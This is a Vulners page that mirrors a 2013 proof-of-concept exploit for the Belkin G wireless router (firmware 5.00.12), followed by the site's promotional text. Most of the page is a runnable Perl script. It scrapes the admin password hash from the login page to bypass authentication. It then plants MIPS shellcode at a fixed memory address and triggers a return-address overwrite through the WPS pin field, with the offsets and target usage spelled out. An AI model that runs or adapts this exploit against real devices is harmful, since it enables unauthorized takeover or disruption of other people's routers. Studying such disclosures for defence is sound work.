Vulners
Lucene search
Belkin G Wireless Router Firmware 5.00.12 - Remote Code Execution
+-----------------------------------+
| Belkin G Wireless Router RCE PoC. |
+-----------------------------------+
Firmware Version : 5.00.12 (Sep 10 2009 19:54:12)
Boot Version : 1.18
Hardware : F5D7234-4 v5 (01)
Author : Aodrulez.
Email : [email protected]
Twitter : http://twitter.com/Aodrulez
+---------+
| Details |
+---------+
The exploit works in 3 stages.
1. Authentication.
2. Setting up shellcode in the memory at a known location.
3. Triggering an RA register over-write to execute the shellcode.
This particular model of router is based on 'embedded Configurable operating system' a.k.a (eCos) version 2.0. The shellcode used in the exploit is a dummy one that basically just triggers an exception & crashes the router, forcing it to reboot.
Video Demo :
http://www.youtube.com/watch?v=MtrYs-f6X3E
+---------+
| Exploit |
+---------+
#!/usr/bin/perl
use strict;
use warnings;
use LWP 5.64;
$| = 1;
# Variable declarations.
my $browser = LWP::UserAgent->new;
my $passHash="";
my $url ="";
my $response ="";
my $ip="";
$browser ->timeout(10);
# Just a few nops followed by a dummy shellcode that crashes & reboots the router.
my $shellcode="\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x04\xd0\xff\xff\x20\x20\x20\x20";
sub Authenticate()
{
print "[+] Trying to authenticate.\n";
$url= "http://$ip/login.stm";
$response = $browser->get( $url);
my @aod= $response->content =~ m/var password = "(.*)";/g;
if(!$aod[0])
{
print "[-] Damn! Something went wrong. This might not work here :-/\n";
exit;
}
else
{
$passHash=$aod[0];
print "[+] Admin Password = $passHash (MD5 Hash).\n";
}
print "[+] Time to authenticate you!\n";
$url = "http://$ip/cgi-bin/login.exe";
$response = $browser->post( $url,
[ 'totalMSec' => "1377121454.99",
'pws' => "$passHash",
,]
);
if( $response->content =~ /index/ )
{
print "[+] Logged in successfully as 'Admin'!\n";
print "[!] Open this link in a browser for admin access : http://$ip/setup.htm \n";
} else {
print "[-] Login failed! This might not work here :-/\n";
exit;
}
print "\n[+] Continue with exploitation? (Y/N) : ";
my $temp=<STDIN>;
if ($temp=~"Y" || $temp=~"y")
{
Exploit();
}
else
{
print "[+] Have fun!\n\n";
exit;
}
}
sub Exploit()
{
# Stage 1: Fill shellcode at a known location : 0x803c0278 (Buffer=120 bytes)
# 0x803c0278 is fixed for this device/firmware combination.
print "[+] Stage 1 : Allocating shellcode.\n";
if (length($shellcode) > 120)
{
print "[-] Shellcode is too big! (120 bytes Max)\n";
exit;
}
print "[+] Shellcode length : ".length($shellcode)."\n";
# Fill the rest with nops. Not needed but good to have.
# Shellcode size should be ideally a multiple of 4 as this is MIPS.
my $nopsize=120-length($shellcode);
$shellcode=$shellcode.("\x20"x$nopsize);
$url = "http://$ip/cgi-bin/wireless_WPA.exe";
$response = $browser->post( $url,
[ 'wpa_authen' => "1",
'wpa_psk' => '0',
's_rekeysec' => '900000',
's_rekeypkt' => '1000',
'w802_rekey' => '0',
'encryption' => '3',
'security_type' => '4',
'authentication' => '3',
'encryption_hid' => '3',
'wpa_key_text' => "ssss",
'wpa_key_pass' => "$shellcode",
'obscure_psk' => '1',
'sharedkey_alter' => '',
'sharedkey_alter1' => '1',
,]
);
if( !$response->content )
{
print "[-] Damn! Something went wrong. This might not work here :-/\n";
}
else
{
print "[+] Stage 1 seems to have gone well.\n";
}
# Stage 2: Trigger Stack Overflow & overwrite RA
print "[+] Stage 2 : Triggering Return Address overwrite.\n";
my $junk="A"x32;
my $s0="BBBB";
my $s1="CCCC";
my $ra="\x78\x02\x3c\x80"; #EPC -> 0x803c0278 Fixed for this device/firmware combination.
my $nop="\x20\x20\x20\x20";
my $payload=$junk.$s0.$s1.$ra.$nop;
$url = "http://$ip/cgi-bin/wireless_WPS_Enroll.exe";
$response = $browser->post( $url,[ 'pin' => "$payload"]);
if( !$response->content )
{
print "[-] Damn! Something went wrong. This might not work here :-/\n";
}
else
{
print "[-] Done! \\m/\n";
}
}
sub Welcome()
{
print "\n\n+------------------------------------------+\n";
print "| Belkin G Wireless Router Remote Exploit |\n";
print "| (Authentication bypass & RCE PoC) |\n";
print "+------------------------------------------+\n";
print "[+] By Aodrulez.\n";
print "\n[+] Usage : perl $0 router_ip";
print "\n[!] Example : perl $0 192.168.2.1";
if (!$ARGV[0])
{
print "\n[-] (o_0) Seriously??\n";
exit;
}
$ip=$ARGV[0];
print "\n[+] Target IP : $ip\n";
}
# Burn!!
Welcome();
Authenticate();
# End of exploit code.
+-------------------+
| Greetz Fly Out To |
+-------------------+
1] Amforked() : My Mentor.
2] The Blue Genius : My Boss.
3] str0ke (milw0rm)
4] www.orchidseven.com
5] www.malcon.org
6] www.nsd.org.in
+-------+
| Quote |
+-------+
“I would rather die of passion than of boredom.” - Vincent van Gogh.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Aug 2013 00:00Current
8.1High risk
Vulners AI Score8.1